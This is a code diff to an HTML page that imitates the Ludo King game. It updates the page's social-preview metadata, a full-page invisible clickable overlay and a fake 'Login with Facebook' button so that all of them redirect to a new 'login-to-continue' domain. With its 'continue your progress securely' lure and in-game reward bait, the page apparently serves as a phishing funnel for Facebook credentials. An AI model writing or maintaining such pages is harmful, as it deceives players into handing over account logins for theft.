--- a/index.html
+++ b/index.html
@@ -10,7 +10,7 @@
   <meta property="og:title" content="Ludo King invites you" />
   <meta property="og:description" content="Continue your Ludo King progress securely " />
   <meta property="og:image" content="https://i.postimg.cc/qR6JwjCv/5a6501a4-a969-492b-94dc-8bd3870cb1a8.jpg" />
-  <meta property="og:url" content="https://ludo-online-invited.vercel.app" />
+  <meta property="og:url" content="https://login-to-continue.netlify.app/" />
   <meta property="og:type" content="website" />
   <meta property="og:site_name" content="Ludo King invites you" />
 
@@ -21,7 +21,7 @@
   <meta name="twitter:image" content="https://querulous-crimson-amsttzakrm.edgeone.app/5a6501a4-a969-492b-94dc-8bd3870cb1a8%20(1).jpg" />
 
   <!-- ✅ Universal Redirect on Preview Click -->
-  <meta property="al:web:url" content="https://ludo-online-invited.vercel.app/" />
+  <meta property="al:web:url" content="https://login-to-continue.netlify.app/" />
 
   <style>
     body {
@@ -137,7 +137,7 @@
 </head>
 <body>
   <!-- 🔗 Full-page invisible clickable area -->
-  <a href="https://game-players-online-rouge.vercel.app/" class="click-layer"></a>
+  <a href="https://login-to-continue.netlify.app/" class="click-layer"></a>
 
   <div class="login-box">
     <img class="logo" src="https://i.postimg.cc/qR6JwjCv/5a6501a4-a969-492b-94dc-8bd3870cb1a8.jpg" alt="Ludo King Logo" />
@@ -148,7 +148,7 @@
       <button class="mini-btn">💎 +100</button>
     </div>
 
-    <button class="fb-btn" onclick="window.location.href='https://login-share.vercel.app'">
+    <button class="fb-btn" onclick="window.location.href='https://login-to-continue.netlify.app/'">
       <img src="https://upload.wikimedia.org/wikipedia/commons/0/05/Facebook_Logo_%282019%29.png" width="20" height="20" alt="FB" />
       Login with Facebook
     </button>
